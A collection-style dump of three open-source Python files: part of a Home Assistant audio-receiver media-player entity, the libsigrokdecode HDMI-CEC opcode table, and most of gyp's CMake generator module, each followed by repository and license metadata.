media_content_id=f"preset:{preset.index}", media_content_type=MEDIA_TYPE_MUSIC, can_play=True, can_expand=False, ) for preset in presets.values() ] root = BrowseMedia( title="Root", media_class=MEDIA_CLASS_DIRECTORY, media_content_id="root", media_content_type="library", can_play=False, can_expand=True, children=radio, ) return root async def async_play_media(self, media_type: str, media_id: str, **kwargs) -> None: """Play media.""" if media_id.startswith("preset:"): preset = int(media_id[7:]) await self._state.set_tuner_preset(preset) else: _LOGGER.error("Media %s is not supported", media_id) return @property def source(self): """Return the current input source.""" value = self._state.get_source() if value is None: return None return value.name @property def source_list(self): """List of available input sources.""" return [x.name for x in self._state.get_source_list()] @property def sound_mode(self): """Name of the current sound mode.""" if self._state.zn != 1: return None if self._get_2ch(): value = self._state.get_decode_mode_2ch() else: value = self._state.get_decode_mode_mch() if value: return value.name return None @property def sound_mode_list(self): """List of available sound modes.""" if self._state.zn != 1: return None if self._get_2ch(): return [x.name for x in DecodeMode2CH] return [x.name for x in DecodeModeMCH] @property def is_volume_muted(self): """Boolean if volume is currently muted.""" value = self._state.get_mute() if value is None: return None return value @property def volume_level(self): """Volume level of device.""" value = self._state.get_volume() if value is None: return None return value / 99.0 @property def media_content_type(self): """Content type of current playing media.""" source = self._state.get_source() if source == SourceCodes.DAB: value = MEDIA_TYPE_MUSIC elif source == SourceCodes.FM: value = MEDIA_TYPE_MUSIC else: value = None return value @property def media_content_id(self): """Content type of current playing media.""" 
source = self._state.get_source() if source in (SourceCodes.DAB, SourceCodes.FM): preset = self._state.get_tuner_preset() if preset: value = f"preset:{preset}" else: value = None else: value = None return value @property def media_channel(self): """Channel currently playing.""" source = self._state.get_source() if source == SourceCodes.DAB: value = self._state.get_dab_station() elif source == SourceCodes.FM: value = self._state.get_rds_information() else: value = None return value @property def media_artist(self): """Artist of current playing media, music track only.""" source = self._state.get_source() if source == SourceCodes.DAB: value = self._state.get_dls_pdt() else: value = None return value @property def media_title(self): """Title of current playing media.""" source = self._state.get_source() if source is None: return None channel = self.media_channel if channel: value = f"{source.name} - {channel}" else: value = source.name return value
apache-2.0
hufsm/tu_gen2_libsigrokdecode
decoders/cec/protocoldata.py
1
3419
## ## This file is part of the libsigrokdecode project. ## ## Copyright (C) 2018 Jorge Solla Rubiales <jorgesolla@gmail.com> ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## This program is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with this program. If not, see <http://www.gnu.org/licenses/>. ## logical_adresses = [ 'TV', 'Recording_1', 'Recording_2', 'Tuner_1', 'Playback_1', 'AudioSystem', 'Tuner2', 'Tuner3', 'Playback_2', 'Recording_3', 'Tuner_4', 'Playback_3', 'Backup_1', 'Backup_2', 'FreeUse', ] # List taken from LibCEC. 
opcodes = { 0x82: 'ACTIVE_SOURCE', 0x04: 'IMAGE_VIEW_ON', 0x0D: 'TEXT_VIEW_ON', 0x9D: 'INACTIVE_SOURCE', 0x85: 'REQUEST_ACTIVE_SOURCE', 0x80: 'ROUTING_CHANGE', 0x81: 'ROUTING_INFORMATION', 0x86: 'SET_STREAM_PATH', 0x36: 'STANDBY', 0x0B: 'RECORD_OFF', 0x09: 'RECORD_ON', 0x0A: 'RECORD_STATUS', 0x0F: 'RECORD_TV_SCREEN', 0x33: 'CLEAR_ANALOGUE_TIMER', 0x99: 'CLEAR_DIGITAL_TIMER', 0xA1: 'CLEAR_EXTERNAL_TIMER', 0x34: 'SET_ANALOGUE_TIMER', 0x97: 'SET_DIGITAL_TIMER', 0xA2: 'SET_EXTERNAL_TIMER', 0x67: 'SET_TIMER_PROGRAM_TITLE', 0x43: 'TIMER_CLEARED_STATUS', 0x35: 'TIMER_STATUS', 0x9E: 'CEC_VERSION', 0x9F: 'GET_CEC_VERSION', 0x83: 'GIVE_PHYSICAL_ADDRESS', 0x91: 'GET_MENU_LANGUAGE', 0x84: 'REPORT_PHYSICAL_ADDRESS', 0x32: 'SET_MENU_LANGUAGE', 0x42: 'DECK_CONTROL', 0x1B: 'DECK_STATUS', 0x1A: 'GIVE_DECK_STATUS', 0x41: 'PLAY', 0x08: 'GIVE_TUNER_DEVICE_STATUS', 0x92: 'SELECT_ANALOGUE_SERVICE', 0x93: 'SELECT_DIGITAL_SERVICE', 0x07: 'TUNER_DEVICE_STATUS', 0x06: 'TUNER_STEP_DECREMENT', 0x05: 'TUNER_STEP_INCREMENT', 0x87: 'DEVICE_VENDOR_ID', 0x8C: 'GIVE_DEVICE_VENDOR_ID', 0x89: 'VENDOR_COMMAND', 0xA0: 'VENDOR_COMMAND_WITH_ID', 0x8A: 'VENDOR_REMOTE_BUTTON_DOWN', 0x8B: 'VENDOR_REMOTE_BUTTON_UP', 0x64: 'SET_OSD_STRING', 0x46: 'GIVE_OSD_NAME', 0x47: 'SET_OSD_NAME', 0x8D: 'MENU_REQUEST', 0x8E: 'MENU_STATUS', 0x44: 'USER_CONTROL_PRESSED', 0x45: 'USER_CONTROL_RELEASE', 0x8F: 'GIVE_DEVICE_POWER_STATUS', 0x90: 'REPORT_POWER_STATUS', 0x00: 'FEATURE_ABORT', 0xFF: 'ABORT', 0x71: 'GIVE_AUDIO_STATUS', 0x7D: 'GIVE_SYSTEM_AUDIO_MODE_STATUS', 0x7A: 'REPORT_AUDIO_STATUS', 0x72: 'SET_SYSTEM_AUDIO_MODE', 0x70: 'SYSTEM_AUDIO_MODE_REQUEST', 0x7E: 'SYSTEM_AUDIO_MODE_STATUS', 0x9A: 'SET_AUDIO_RATE', } def resolve_logical_address(id, is_initiator): if id < 0 or id > 0x0F: return 'Invalid' # Special handling of 0x0F. 
if id == 0x0F: return 'Unregistered' if is_initiator else 'Broadcast' return logical_adresses[id] def decode_header(header): src = (header & 0xF0) >> 4 dst = (header & 0x0F) return (resolve_logical_address(src, 1), resolve_logical_address(dst, 0))
gpl-3.0
romero1989/suge-project
node_modules/laravel-elixir/node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/cmake.py
1355
44604
# Copyright (c) 2013 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """cmake output module This module is under development and should be considered experimental. This module produces cmake (2.8.8+) input as its output. One CMakeLists.txt is created for each configuration. This module's original purpose was to support editing in IDEs like KDevelop which use CMake for project management. It is also possible to use CMake to generate projects for other IDEs such as eclipse cdt and code::blocks. QtCreator will convert the CMakeLists.txt to a code::blocks cbp for the editor to read, but build using CMake. As a result QtCreator editor is unaware of compiler defines. The generated CMakeLists.txt can also be used to build on Linux. There is currently no support for building on platforms other than Linux. The generated CMakeLists.txt should properly compile all projects. However, there is a mismatch between gyp and cmake with regard to linking. All attempts are made to work around this, but CMake sometimes sees -Wl,--start-group as a library and incorrectly repeats it. As a result the output of this generator should not be relied on for building. When using with kdevelop, use version 4.4+. Previous versions of kdevelop will not be able to find the header file directories described in the generated CMakeLists.txt file. 
""" import multiprocessing import os import signal import string import subprocess import gyp.common generator_default_variables = { 'EXECUTABLE_PREFIX': '', 'EXECUTABLE_SUFFIX': '', 'STATIC_LIB_PREFIX': 'lib', 'STATIC_LIB_SUFFIX': '.a', 'SHARED_LIB_PREFIX': 'lib', 'SHARED_LIB_SUFFIX': '.so', 'SHARED_LIB_DIR': '${builddir}/lib.${TOOLSET}', 'LIB_DIR': '${obj}.${TOOLSET}', 'INTERMEDIATE_DIR': '${obj}.${TOOLSET}/${TARGET}/geni', 'SHARED_INTERMEDIATE_DIR': '${obj}/gen', 'PRODUCT_DIR': '${builddir}', 'RULE_INPUT_PATH': '${RULE_INPUT_PATH}', 'RULE_INPUT_DIRNAME': '${RULE_INPUT_DIRNAME}', 'RULE_INPUT_NAME': '${RULE_INPUT_NAME}', 'RULE_INPUT_ROOT': '${RULE_INPUT_ROOT}', 'RULE_INPUT_EXT': '${RULE_INPUT_EXT}', 'CONFIGURATION_NAME': '${configuration}', } FULL_PATH_VARS = ('${CMAKE_CURRENT_LIST_DIR}', '${builddir}', '${obj}') generator_supports_multiple_toolsets = True generator_wants_static_library_dependencies_adjusted = True COMPILABLE_EXTENSIONS = { '.c': 'cc', '.cc': 'cxx', '.cpp': 'cxx', '.cxx': 'cxx', '.s': 's', # cc '.S': 's', # cc } def RemovePrefix(a, prefix): """Returns 'a' without 'prefix' if it starts with 'prefix'.""" return a[len(prefix):] if a.startswith(prefix) else a def CalculateVariables(default_variables, params): """Calculate additional variables for use in the build (called by gyp).""" default_variables.setdefault('OS', gyp.common.GetFlavor(params)) def Compilable(filename): """Return true if the file is compilable (should be in OBJS).""" return any(filename.endswith(e) for e in COMPILABLE_EXTENSIONS) def Linkable(filename): """Return true if the file is linkable (should be on the link line).""" return filename.endswith('.o') def NormjoinPathForceCMakeSource(base_path, rel_path): """Resolves rel_path against base_path and returns the result. If rel_path is an absolute path it is returned unchanged. Otherwise it is resolved against base_path and normalized. If the result is a relative path, it is forced to be relative to the CMakeLists.txt. 
""" if os.path.isabs(rel_path): return rel_path if any([rel_path.startswith(var) for var in FULL_PATH_VARS]): return rel_path # TODO: do we need to check base_path for absolute variables as well? return os.path.join('${CMAKE_CURRENT_LIST_DIR}', os.path.normpath(os.path.join(base_path, rel_path))) def NormjoinPath(base_path, rel_path): """Resolves rel_path against base_path and returns the result. TODO: what is this really used for? If rel_path begins with '$' it is returned unchanged. Otherwise it is resolved against base_path if relative, then normalized. """ if rel_path.startswith('$') and not rel_path.startswith('${configuration}'): return rel_path return os.path.normpath(os.path.join(base_path, rel_path)) def CMakeStringEscape(a): """Escapes the string 'a' for use inside a CMake string. This means escaping '\' otherwise it may be seen as modifying the next character '"' otherwise it will end the string ';' otherwise the string becomes a list The following do not need to be escaped '#' when the lexer is in string state, this does not start a comment The following are yet unknown '$' generator variables (like ${obj}) must not be escaped, but text $ should be escaped what is wanted is to know which $ come from generator variables """ return a.replace('\\', '\\\\').replace(';', '\\;').replace('"', '\\"') def SetFileProperty(output, source_name, property_name, values, sep): """Given a set of source file, sets the given property on them.""" output.write('set_source_files_properties(') output.write(source_name) output.write(' PROPERTIES ') output.write(property_name) output.write(' "') for value in values: output.write(CMakeStringEscape(value)) output.write(sep) output.write('")\n') def SetFilesProperty(output, variable, property_name, values, sep): """Given a set of source files, sets the given property on them.""" output.write('set_source_files_properties(') WriteVariable(output, variable) output.write(' PROPERTIES ') output.write(property_name) output.write(' "') 
  for value in values:
    output.write(CMakeStringEscape(value))
    output.write(sep)
  output.write('")\n')


def SetTargetProperty(output, target_name, property_name, values, sep=''):
  """Given a target, sets the given property."""
  output.write('set_target_properties(')
  output.write(target_name)
  output.write(' PROPERTIES ')
  output.write(property_name)
  output.write(' "')
  for value in values:
    output.write(CMakeStringEscape(value))
    output.write(sep)
  output.write('")\n')


def SetVariable(output, variable_name, value):
  """Sets a CMake variable."""
  output.write('set(')
  output.write(variable_name)
  output.write(' "')
  output.write(CMakeStringEscape(value))
  output.write('")\n')


def SetVariableList(output, variable_name, values):
  """Sets a CMake variable to a list."""
  if not values:
    return SetVariable(output, variable_name, "")
  if len(values) == 1:
    return SetVariable(output, variable_name, values[0])
  output.write('list(APPEND ')
  output.write(variable_name)
  output.write('\n "')
  output.write('"\n "'.join([CMakeStringEscape(value) for value in values]))
  output.write('")\n')


def UnsetVariable(output, variable_name):
  """Unsets a CMake variable."""
  output.write('unset(')
  output.write(variable_name)
  output.write(')\n')


def WriteVariable(output, variable_name, prepend=None):
  # Emits a CMake variable reference '${variable_name}', optionally preceded
  # by 'prepend' (commonly a separating space).
  if prepend:
    output.write(prepend)
  output.write('${')
  output.write(variable_name)
  output.write('}')


class CMakeTargetType(object):
  # How a gyp target type maps onto CMake: the declaring command
  # (add_executable/add_library/...), the library modifier keyword
  # (STATIC/SHARED/MODULE/...), and the prefix used for output-related
  # target properties (RUNTIME/ARCHIVE/LIBRARY).
  def __init__(self, command, modifier, property_modifier):
    self.command = command
    self.modifier = modifier
    self.property_modifier = property_modifier


cmake_target_type_from_gyp_target_type = {
  'executable': CMakeTargetType('add_executable', None, 'RUNTIME'),
  'static_library': CMakeTargetType('add_library', 'STATIC', 'ARCHIVE'),
  'shared_library': CMakeTargetType('add_library', 'SHARED', 'LIBRARY'),
  'loadable_module': CMakeTargetType('add_library', 'MODULE', 'LIBRARY'),
  'none': CMakeTargetType('add_custom_target', 'SOURCES', None),
}


def StringToCMakeTargetName(a):
  """Converts the given string 'a' to a valid CMake target name.

  All invalid characters are replaced by '_'.
  Invalid for cmake: ' ', '/', '(', ')', '"'
  Invalid for make: ':'
  Invalid for unknown reasons but cause failures: '.'
  """
  return a.translate(string.maketrans(' /():."', '_______'))


def WriteActions(target_name, actions, extra_sources, extra_deps,
                 path_to_gyp, output):
  """Write CMake for the 'actions' in the target.

  Args:
    target_name: the name of the CMake target being generated.
    actions: the Gyp 'actions' dict for this target.
    extra_sources: [(<cmake_src>, <src>)] to append with generated source
        files.
    extra_deps: [<cmake_target>] to append with generated targets.
    path_to_gyp: relative path from CMakeLists.txt being generated to
        the Gyp file in which the target being generated is defined.
  """
  for action in actions:
    action_name = StringToCMakeTargetName(action['action_name'])
    action_target_name = '%s__%s' % (target_name, action_name)

    inputs = action['inputs']
    inputs_name = action_target_name + '__input'
    SetVariableList(output, inputs_name,
        [NormjoinPathForceCMakeSource(path_to_gyp, dep) for dep in inputs])

    outputs = action['outputs']
    cmake_outputs = [NormjoinPathForceCMakeSource(path_to_gyp, out)
                     for out in outputs]
    outputs_name = action_target_name + '__output'
    SetVariableList(output, outputs_name, cmake_outputs)

    # Build up a list of outputs.
    # Collect the output dirs we'll need.
    dirs = set(dir for dir in (os.path.dirname(o) for o in outputs) if dir)

    if int(action.get('process_outputs_as_sources', False)):
      extra_sources.extend(zip(cmake_outputs, outputs))

    # add_custom_command
    output.write('add_custom_command(OUTPUT ')
    WriteVariable(output, outputs_name)
    output.write('\n')

    if len(dirs) > 0:
      for directory in dirs:
        output.write(' COMMAND ${CMAKE_COMMAND} -E make_directory ')
        output.write(directory)
        output.write('\n')

    output.write(' COMMAND ')
    output.write(gyp.common.EncodePOSIXShellList(action['action']))
    output.write('\n')

    output.write(' DEPENDS ')
    WriteVariable(output, inputs_name)
    output.write('\n')

    output.write(' WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/')
    output.write(path_to_gyp)
    output.write('\n')

    output.write(' COMMENT ')
    if 'message' in action:
      output.write(action['message'])
    else:
      output.write(action_target_name)
    output.write('\n')

    output.write(' VERBATIM\n')
    output.write(')\n')

    # add_custom_target
    output.write('add_custom_target(')
    output.write(action_target_name)
    output.write('\n DEPENDS ')
    WriteVariable(output, outputs_name)
    output.write('\n SOURCES ')
    WriteVariable(output, inputs_name)
    output.write('\n)\n')

    extra_deps.append(action_target_name)


def NormjoinRulePathForceCMakeSource(base_path, rel_path, rule_source):
  # Like NormjoinPathForceCMakeSource, but rule outputs built from
  # ${RULE_INPUT_PATH}/${RULE_INPUT_DIRNAME} inherit "already absolute"
  # status from the rule source they were derived from.
  if rel_path.startswith(("${RULE_INPUT_PATH}","${RULE_INPUT_DIRNAME}")):
    if any([rule_source.startswith(var) for var in FULL_PATH_VARS]):
      return rel_path
  return NormjoinPathForceCMakeSource(base_path, rel_path)


def WriteRules(target_name, rules, extra_sources, extra_deps,
               path_to_gyp, output):
  """Write CMake for the 'rules' in the target.

  Args:
    target_name: the name of the CMake target being generated.
    rules: the Gyp 'rules' dict for this target.
    extra_sources: [(<cmake_src>, <src>)] to append with generated source
        files.
    extra_deps: [<cmake_target>] to append with generated targets.
    path_to_gyp: relative path from CMakeLists.txt being generated to
        the Gyp file in which the target being generated is defined.
""" for rule in rules: rule_name = StringToCMakeTargetName(target_name + '__' + rule['rule_name']) inputs = rule.get('inputs', []) inputs_name = rule_name + '__input' SetVariableList(output, inputs_name, [NormjoinPathForceCMakeSource(path_to_gyp, dep) for dep in inputs]) outputs = rule['outputs'] var_outputs = [] for count, rule_source in enumerate(rule.get('rule_sources', [])): action_name = rule_name + '_' + str(count) rule_source_dirname, rule_source_basename = os.path.split(rule_source) rule_source_root, rule_source_ext = os.path.splitext(rule_source_basename) SetVariable(output, 'RULE_INPUT_PATH', rule_source) SetVariable(output, 'RULE_INPUT_DIRNAME', rule_source_dirname) SetVariable(output, 'RULE_INPUT_NAME', rule_source_basename) SetVariable(output, 'RULE_INPUT_ROOT', rule_source_root) SetVariable(output, 'RULE_INPUT_EXT', rule_source_ext) # Build up a list of outputs. # Collect the output dirs we'll need. dirs = set(dir for dir in (os.path.dirname(o) for o in outputs) if dir) # Create variables for the output, as 'local' variable will be unset. 
these_outputs = [] for output_index, out in enumerate(outputs): output_name = action_name + '_' + str(output_index) SetVariable(output, output_name, NormjoinRulePathForceCMakeSource(path_to_gyp, out, rule_source)) if int(rule.get('process_outputs_as_sources', False)): extra_sources.append(('${' + output_name + '}', out)) these_outputs.append('${' + output_name + '}') var_outputs.append('${' + output_name + '}') # add_custom_command output.write('add_custom_command(OUTPUT\n') for out in these_outputs: output.write(' ') output.write(out) output.write('\n') for directory in dirs: output.write(' COMMAND ${CMAKE_COMMAND} -E make_directory ') output.write(directory) output.write('\n') output.write(' COMMAND ') output.write(gyp.common.EncodePOSIXShellList(rule['action'])) output.write('\n') output.write(' DEPENDS ') WriteVariable(output, inputs_name) output.write(' ') output.write(NormjoinPath(path_to_gyp, rule_source)) output.write('\n') # CMAKE_CURRENT_LIST_DIR is where the CMakeLists.txt lives. # The cwd is the current build directory. 
output.write(' WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/') output.write(path_to_gyp) output.write('\n') output.write(' COMMENT ') if 'message' in rule: output.write(rule['message']) else: output.write(action_name) output.write('\n') output.write(' VERBATIM\n') output.write(')\n') UnsetVariable(output, 'RULE_INPUT_PATH') UnsetVariable(output, 'RULE_INPUT_DIRNAME') UnsetVariable(output, 'RULE_INPUT_NAME') UnsetVariable(output, 'RULE_INPUT_ROOT') UnsetVariable(output, 'RULE_INPUT_EXT') # add_custom_target output.write('add_custom_target(') output.write(rule_name) output.write(' DEPENDS\n') for out in var_outputs: output.write(' ') output.write(out) output.write('\n') output.write('SOURCES ') WriteVariable(output, inputs_name) output.write('\n') for rule_source in rule.get('rule_sources', []): output.write(' ') output.write(NormjoinPath(path_to_gyp, rule_source)) output.write('\n') output.write(')\n') extra_deps.append(rule_name) def WriteCopies(target_name, copies, extra_deps, path_to_gyp, output): """Write CMake for the 'copies' in the target. Args: target_name: the name of the CMake target being generated. actions: the Gyp 'actions' dict for this target. extra_deps: [<cmake_taget>] to append with generated targets. path_to_gyp: relative path from CMakeLists.txt being generated to the Gyp file in which the target being generated is defined. """ copy_name = target_name + '__copies' # CMake gets upset with custom targets with OUTPUT which specify no output. 
  have_copies = any(copy['files'] for copy in copies)
  if not have_copies:
    output.write('add_custom_target(')
    output.write(copy_name)
    output.write(')\n')
    extra_deps.append(copy_name)
    return

  class Copy(object):
    # Accumulates the inputs/outputs for one kind of copy ('copy' for files,
    # 'copy_directory' for directories) so each kind can get its own CMake
    # list variables below.
    def __init__(self, ext, command):
      self.cmake_inputs = []
      self.cmake_outputs = []
      self.gyp_inputs = []
      self.gyp_outputs = []
      self.ext = ext
      self.inputs_name = None
      self.outputs_name = None
      self.command = command

  file_copy = Copy('', 'copy')
  dir_copy = Copy('_dirs', 'copy_directory')

  for copy in copies:
    files = copy['files']
    destination = copy['destination']
    for src in files:
      path = os.path.normpath(src)
      basename = os.path.split(path)[1]
      dst = os.path.join(destination, basename)

      # A source ending in '/' has an empty basename: treat it as a directory.
      copy = file_copy if os.path.basename(src) else dir_copy
      copy.cmake_inputs.append(NormjoinPathForceCMakeSource(path_to_gyp, src))
      copy.cmake_outputs.append(NormjoinPathForceCMakeSource(path_to_gyp, dst))
      copy.gyp_inputs.append(src)
      copy.gyp_outputs.append(dst)

  for copy in (file_copy, dir_copy):
    if copy.cmake_inputs:
      copy.inputs_name = copy_name + '__input' + copy.ext
      SetVariableList(output, copy.inputs_name, copy.cmake_inputs)

      copy.outputs_name = copy_name + '__output' + copy.ext
      SetVariableList(output, copy.outputs_name, copy.cmake_outputs)

  # add_custom_command
  output.write('add_custom_command(\n')

  output.write('OUTPUT')
  for copy in (file_copy, dir_copy):
    if copy.outputs_name:
      WriteVariable(output, copy.outputs_name, ' ')
  output.write('\n')

  for copy in (file_copy, dir_copy):
    for src, dst in zip(copy.gyp_inputs, copy.gyp_outputs):
      # 'cmake -E copy src dst' will create the 'dst' directory if needed.
      output.write('COMMAND ${CMAKE_COMMAND} -E %s ' % copy.command)
      output.write(src)
      output.write(' ')
      output.write(dst)
      output.write("\n")

  output.write('DEPENDS')
  for copy in (file_copy, dir_copy):
    if copy.inputs_name:
      WriteVariable(output, copy.inputs_name, ' ')
  output.write('\n')

  output.write('WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/')
  output.write(path_to_gyp)
  output.write('\n')

  output.write('COMMENT Copying for ')
  output.write(target_name)
  output.write('\n')

  output.write('VERBATIM\n')
  output.write(')\n')

  # add_custom_target
  output.write('add_custom_target(')
  output.write(copy_name)
  output.write('\n DEPENDS')
  for copy in (file_copy, dir_copy):
    if copy.outputs_name:
      WriteVariable(output, copy.outputs_name, ' ')
  output.write('\n SOURCES')
  if file_copy.inputs_name:
    WriteVariable(output, file_copy.inputs_name, ' ')
  output.write('\n)\n')
  extra_deps.append(copy_name)


def CreateCMakeTargetBaseName(qualified_target):
  """This is the name we would like the target to have."""
  _, gyp_target_name, gyp_target_toolset = (
      gyp.common.ParseQualifiedTarget(qualified_target))
  cmake_target_base_name = gyp_target_name
  if gyp_target_toolset and gyp_target_toolset != 'target':
    cmake_target_base_name += '_' + gyp_target_toolset
  return StringToCMakeTargetName(cmake_target_base_name)


def CreateCMakeTargetFullName(qualified_target):
  """An unambiguous name for the target."""
  gyp_file, gyp_target_name, gyp_target_toolset = (
      gyp.common.ParseQualifiedTarget(qualified_target))
  cmake_target_full_name = gyp_file + ':' + gyp_target_name
  if gyp_target_toolset and gyp_target_toolset != 'target':
    cmake_target_full_name += '_' + gyp_target_toolset
  return StringToCMakeTargetName(cmake_target_full_name)


class CMakeNamer(object):
  """Converts Gyp target names into CMake target names.

  CMake requires that target names be globally unique. One way to
  ensure this is to fully qualify the names of the targets.
Unfortunatly, this ends up with all targets looking like "chrome_chrome_gyp_chrome" instead of just "chrome". If this generator were only interested in building, it would be possible to fully qualify all target names, then create unqualified target names which depend on all qualified targets which should have had that name. This is more or less what the 'make' generator does with aliases. However, one goal of this generator is to create CMake files for use with IDEs, and fully qualified names are not as user friendly. Since target name collision is rare, we do the above only when required. Toolset variants are always qualified from the base, as this is required for building. However, it also makes sense for an IDE, as it is possible for defines to be different. """ def __init__(self, target_list): self.cmake_target_base_names_conficting = set() cmake_target_base_names_seen = set() for qualified_target in target_list: cmake_target_base_name = CreateCMakeTargetBaseName(qualified_target) if cmake_target_base_name not in cmake_target_base_names_seen: cmake_target_base_names_seen.add(cmake_target_base_name) else: self.cmake_target_base_names_conficting.add(cmake_target_base_name) def CreateCMakeTargetName(self, qualified_target): base_name = CreateCMakeTargetBaseName(qualified_target) if base_name in self.cmake_target_base_names_conficting: return CreateCMakeTargetFullName(qualified_target) return base_name def WriteTarget(namer, qualified_target, target_dicts, build_dir, config_to_use, options, generator_flags, all_qualified_targets, output): # The make generator does this always. # TODO: It would be nice to be able to tell CMake all dependencies. 
  circular_libs = generator_flags.get('circular', True)

  if not generator_flags.get('standalone', False):
    output.write('\n#')
    output.write(qualified_target)
    output.write('\n')

  gyp_file, _, _ = gyp.common.ParseQualifiedTarget(qualified_target)
  rel_gyp_file = gyp.common.RelativePath(gyp_file, options.toplevel_dir)
  rel_gyp_dir = os.path.dirname(rel_gyp_file)

  # Relative path from build dir to top dir.
  build_to_top = gyp.common.InvertRelativePath(build_dir, options.toplevel_dir)
  # Relative path from build dir to gyp dir.
  build_to_gyp = os.path.join(build_to_top, rel_gyp_dir)

  path_from_cmakelists_to_gyp = build_to_gyp

  spec = target_dicts.get(qualified_target, {})
  config = spec.get('configurations', {}).get(config_to_use, {})

  target_name = spec.get('target_name', '<missing target name>')
  target_type = spec.get('type', '<missing target type>')
  target_toolset = spec.get('toolset')

  cmake_target_type = cmake_target_type_from_gyp_target_type.get(target_type)
  if cmake_target_type is None:
    print ('Target %s has unknown target type %s, skipping.' %
           ( target_name, target_type ) )
    return

  SetVariable(output, 'TARGET', target_name)
  SetVariable(output, 'TOOLSET', target_toolset)

  cmake_target_name = namer.CreateCMakeTargetName(qualified_target)

  extra_sources = []
  extra_deps = []

  # Actions must come first, since they can generate more OBJs for use below.
  if 'actions' in spec:
    WriteActions(cmake_target_name, spec['actions'], extra_sources, extra_deps,
                 path_from_cmakelists_to_gyp, output)

  # Rules must be early like actions.
  if 'rules' in spec:
    WriteRules(cmake_target_name, spec['rules'], extra_sources, extra_deps,
               path_from_cmakelists_to_gyp, output)

  # Copies
  if 'copies' in spec:
    WriteCopies(cmake_target_name, spec['copies'], extra_deps,
                path_from_cmakelists_to_gyp, output)

  # Target and sources
  srcs = spec.get('sources', [])

  # Gyp separates the sheep from the goats based on file extensions.
  # A full separation is done here because of flag handling (see below).
  s_sources = []
  c_sources = []
  cxx_sources = []
  linkable_sources = []
  other_sources = []
  for src in srcs:
    _, ext = os.path.splitext(src)
    src_type = COMPILABLE_EXTENSIONS.get(ext, None)
    src_norm_path = NormjoinPath(path_from_cmakelists_to_gyp, src);

    if src_type == 's':
      s_sources.append(src_norm_path)
    elif src_type == 'cc':
      c_sources.append(src_norm_path)
    elif src_type == 'cxx':
      cxx_sources.append(src_norm_path)
    elif Linkable(ext):
      linkable_sources.append(src_norm_path)
    else:
      other_sources.append(src_norm_path)

  # Generated sources from actions/rules are classified the same way, keyed
  # on the extension of the real (gyp-side) source.
  for extra_source in extra_sources:
    src, real_source = extra_source
    _, ext = os.path.splitext(real_source)
    src_type = COMPILABLE_EXTENSIONS.get(ext, None)

    if src_type == 's':
      s_sources.append(src)
    elif src_type == 'cc':
      c_sources.append(src)
    elif src_type == 'cxx':
      cxx_sources.append(src)
    elif Linkable(ext):
      linkable_sources.append(src)
    else:
      other_sources.append(src)

  s_sources_name = None
  if s_sources:
    s_sources_name = cmake_target_name + '__asm_srcs'
    SetVariableList(output, s_sources_name, s_sources)

  c_sources_name = None
  if c_sources:
    c_sources_name = cmake_target_name + '__c_srcs'
    SetVariableList(output, c_sources_name, c_sources)

  cxx_sources_name = None
  if cxx_sources:
    cxx_sources_name = cmake_target_name + '__cxx_srcs'
    SetVariableList(output, cxx_sources_name, cxx_sources)

  linkable_sources_name = None
  if linkable_sources:
    linkable_sources_name = cmake_target_name + '__linkable_srcs'
    SetVariableList(output, linkable_sources_name, linkable_sources)

  other_sources_name = None
  if other_sources:
    other_sources_name = cmake_target_name + '__other_srcs'
    SetVariableList(output, other_sources_name, other_sources)

  # CMake gets upset when executable targets provide no sources.
  # http://www.cmake.org/pipermail/cmake/2010-July/038461.html
  dummy_sources_name = None
  has_sources = (s_sources_name or
                 c_sources_name or
                 cxx_sources_name or
                 linkable_sources_name or
                 other_sources_name)
  if target_type == 'executable' and not has_sources:
    dummy_sources_name = cmake_target_name + '__dummy_srcs'
    SetVariable(output, dummy_sources_name,
                "${obj}.${TOOLSET}/${TARGET}/genc/dummy.c")
    output.write('if(NOT EXISTS "')
    WriteVariable(output, dummy_sources_name)
    output.write('")\n')
    output.write(' file(WRITE "')
    WriteVariable(output, dummy_sources_name)
    output.write('" "")\n')
    output.write("endif()\n")

  # CMake is opposed to setting linker directories and considers the practice
  # of setting linker directories dangerous. Instead, it favors the use of
  # find_library and passing absolute paths to target_link_libraries.
  # However, CMake does provide the command link_directories, which adds
  # link directories to targets defined after it is called.
  # As a result, link_directories must come before the target definition.
  # CMake unfortunately has no means of removing entries from
  # LINK_DIRECTORIES.
  library_dirs = config.get('library_dirs')
  if library_dirs is not None:
    output.write('link_directories(')
    for library_dir in library_dirs:
      output.write(' ')
      output.write(NormjoinPath(path_from_cmakelists_to_gyp, library_dir))
      output.write('\n')
    output.write(')\n')

  output.write(cmake_target_type.command)
  output.write('(')
  output.write(cmake_target_name)

  if cmake_target_type.modifier is not None:
    output.write(' ')
    output.write(cmake_target_type.modifier)

  if s_sources_name:
    WriteVariable(output, s_sources_name, ' ')
  if c_sources_name:
    WriteVariable(output, c_sources_name, ' ')
  if cxx_sources_name:
    WriteVariable(output, cxx_sources_name, ' ')
  if linkable_sources_name:
    WriteVariable(output, linkable_sources_name, ' ')
  if other_sources_name:
    WriteVariable(output, other_sources_name, ' ')
  if dummy_sources_name:
    WriteVariable(output, dummy_sources_name, ' ')

  output.write(')\n')

  # Let CMake know if the 'all' target should depend on this target.
  exclude_from_all = ('TRUE' if qualified_target not in all_qualified_targets
                      else 'FALSE')
  SetTargetProperty(output, cmake_target_name,
                    'EXCLUDE_FROM_ALL', exclude_from_all)
  for extra_target_name in extra_deps:
    SetTargetProperty(output, extra_target_name,
                      'EXCLUDE_FROM_ALL', exclude_from_all)

  # Output name and location.
  if target_type != 'none':
    # Link as 'C' if there are no other files
    if not c_sources and not cxx_sources:
      SetTargetProperty(output, cmake_target_name, 'LINKER_LANGUAGE', ['C'])

    # Mark uncompiled sources as uncompiled.
    if other_sources_name:
      output.write('set_source_files_properties(')
      WriteVariable(output, other_sources_name, '')
      output.write(' PROPERTIES HEADER_FILE_ONLY "TRUE")\n')

